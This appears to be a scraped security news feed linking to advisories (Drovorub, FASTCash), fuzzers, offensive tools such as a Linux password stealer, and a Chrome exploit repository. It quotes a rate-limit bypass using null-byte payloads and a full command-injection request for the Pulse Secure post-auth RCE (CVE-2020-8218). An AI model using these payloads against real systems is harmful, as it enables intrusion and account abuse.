The #FBI and #NSAGov have released a cybersecurity advisory about a malware known as Drovorub. Russia’s military intelligence unit created Drovorub to target customers who use Linux systems. http://ow.ly/s5uJ50AYHGk
www.fbi.gov
NSA and FBI Expose Russian Previously Undisclosed Malware Drovorub in Cybersecurity Advisory — FBI
The National Security Agency (NSA) and the Federal Bureau of Investigation (FBI) released a new cybersecurity advisory about previously undisclosed Russian malware.
Windows Debugger API — The End of Versioned Structures
Some time ago I was introduced to the Windows debugger API and found it incredibly useful for projects that focus on forensics or analysis of data on a machine. This API allows us to open a dump file taken on any windows machine and read information from it using the symbols that match the specific modules contained in the dump.
https://medium.com/swlh/windows-debugger-api-the-end-of-versioned-structures-ac4acaa351bd
#windows #internals #debug
Some time ago I was introduced to the Windows debugger API and found it incredibly useful for projects that focus on forensics or analysis of data on a machine. This API allows us to open a dump file taken on any windows machine and read information from it using the symbols that match the specific modules contained in the dump.
https://medium.com/swlh/windows-debugger-api-the-end-of-versioned-structures-ac4acaa351bd
#windows #internals #debug
Medium
Windows Debugger API — The End of Versioned Structures
Some time ago I was introduced to the Windows debugger API and found it incredibly useful for projects that focus on forensics or analysis…
Researchers exploited a vulnerability in Emotet malware to create a KILL-SWITCH, and prevented it from spreading for six months.
Details — https://thehackernews.com/2020/08/emotet-botnet-malware.html
Details — https://thehackernews.com/2020/08/emotet-botnet-malware.html
Wanna Bypass Rate Limit ? Try Bypass with adding null payload %00, %0d%0a, %09, %0C, %20, %0 on email.
Not Works ?
Just try adding "blank space" on the email, works!
https://twitter.com/harrmahar/status/1247306384128872448
Not Works ?
Just try adding "blank space" on the email, works!
https://twitter.com/harrmahar/status/1247306384128872448
Twitter
Harrmahar
Wanna Bypass Rate Limit ? Try Bypass with adding null payload %00, %0d%0a, %09, %0C, %20, %0 on email. Not Works ? Just try adding "blank space" on the email, works! Alhamdulillah, Allah has willed it to me to got this on a Private Program. This my second…
Forwarded from Security Analysis
Fuzzing JavaScript Engines with Aspect-preserving Mutation
https://github.com/sslab-gatech/DIE
#reverse #expdev #fuzzing #javanoscript @securation
https://github.com/sslab-gatech/DIE
#reverse #expdev #fuzzing #javanoscript @securation
GitHub
GitHub - sslab-gatech/DIE: Fuzzing JavaScript Engines with Aspect-preserving Mutation
Fuzzing JavaScript Engines with Aspect-preserving Mutation - sslab-gatech/DIE
#CyberWar: Cyber attacks again hit Israel’s water system, shutting agricultural pumps. This is the second ICS-SCADA attack possibly by Iran 🇮🇷 in response to Stuxnet-2 attack by Israel/ United States.
https://www.timesofisrael.com/cyber-attacks-again-hit-israels-water-system-shutting-agricultural-pumps/
#Israel #UnitedStates #Iran #Stuxnet2
https://www.timesofisrael.com/cyber-attacks-again-hit-israels-water-system-shutting-agricultural-pumps/
#Israel #UnitedStates #Iran #Stuxnet2
The Times of Israel
Cyber attacks again hit Israel’s water system, shutting agricultural pumps
Incident follows more serious April attack attributed to Iran that officials said could have poisoned hundreds with chlorine
ICYMI: Browser based port scanner triggered via website.
https://defuse.ca/in-browser-port-scanning.htm
https://defuse.ca/in-browser-port-scanning.htm
defuse.ca
Port Scanning Local Network From a Web Browser
Malicious web pages can port scan your local network.
UAFuzz: Binary-level Directed Fuzzing for Use-After-Free Vulnerabilities https://github.com/strongcourage/uafuzz #fuzzing
GitHub
GitHub - strongcourage/uafuzz: UAFuzz: Binary-level Directed Fuzzing for Use-After-Free Vulnerabilities
UAFuzz: Binary-level Directed Fuzzing for Use-After-Free Vulnerabilities - strongcourage/uafuzz
North Korean Malicious Cyber Activity: FASTCash
https://us-cert.cisa.gov/ncas/current-activity/2020/08/26/north-korean-malicious-cyber-activity-fastcash
via CISA Current Activity
https://us-cert.cisa.gov/ncas/current-activity/2020/08/26/north-korean-malicious-cyber-activity-fastcash
via CISA Current Activity
us-cert.cisa.gov
North Korean Malicious Cyber Activity: FASTCash | CISA
The Cybersecurity Security and Infrastructure Security Agency (CISA), the Department of the Treasury, the Federal Bureau of Investigation, and U.S. Cyber Command have released a joint Technical Alert and three Malware Analysis Reports (MARs) on the North…
monsoon - a fast and flexible HTTP enumerator written in Go
https://www.reddit.com/r/netsec/comments/ihmri6/monsoon_a_fast_and_flexible_http_enumerator/
via /r/netsec - Information Security News & Discussion
https://www.reddit.com/r/netsec/comments/ihmri6/monsoon_a_fast_and_flexible_http_enumerator/
via /r/netsec - Information Security News & Discussion
reddit
monsoon - a fast and flexible HTTP enumerator written in Go
Posted in r/netsec by u/RedTeamPentesting • 87 points and 27 comments
Example of Malicious DLL Injected in PowerShell, (Fri, Aug 28th)
https://isc.sans.edu/diary/rss/26512
https://isc.sans.edu/diary/rss/26512
In a new campaign...
Iranian hackers pose as journalists (over WhatsApp and LinkedIn) to trick high-value targets into handing over login credentials or installing spyware and steal sensitive information.
Read more: https://thehackernews.com/2020/08/hackers-journalist-malware.html
Iranian hackers pose as journalists (over WhatsApp and LinkedIn) to trick high-value targets into handing over login credentials or installing spyware and steal sensitive information.
Read more: https://thehackernews.com/2020/08/hackers-journalist-malware.html
Impost3r is a tool that aim to steal many kinds of linux passwords(including ssh,su,sudo) written by C
https://github.com/ph4ntonn/Impost3r/blob/master/README_EN.md
https://github.com/ph4ntonn/Impost3r/blob/master/README_EN.md
GitHub
Impost3r/README_EN.md at master · ph4ntonn/Impost3r
👻Impost3r -- A linux password thief. Contribute to ph4ntonn/Impost3r development by creating an account on GitHub.
1day exploit for chrome version <= 83.0.4103.61
https://github.com/r4j0x00/exploits
https://github.com/v8/v8/commit/85bc1b0cab31cc064efc65e05adb81fee814261b#diff-2e2c5645d87dabecd3793b1f10300974
https://github.com/r4j0x00/exploits
https://github.com/v8/v8/commit/85bc1b0cab31cc064efc65e05adb81fee814261b#diff-2e2c5645d87dabecd3793b1f10300974
GitHub
GitHub - r4j0x00/exploits
Contribute to r4j0x00/exploits development by creating an account on GitHub.
CVE-2020-8218 : Pulse Secure SSL-VPN post-auth RCE
hxxps://x.x.x.x/dana-admin/license/downloadlicenses.cgi?cmd=download&txtVLSAuthCode=whatever -n '($x="ls /",system$x); #' -e /data/runtime/tmp/tt/setcookie.thtml.ttc
hxxps://x.x.x.x/dana-admin/license/downloadlicenses.cgi?cmd=download&txtVLSAuthCode=whatever -n '($x="ls /",system$x); #' -e /data/runtime/tmp/tt/setcookie.thtml.ttc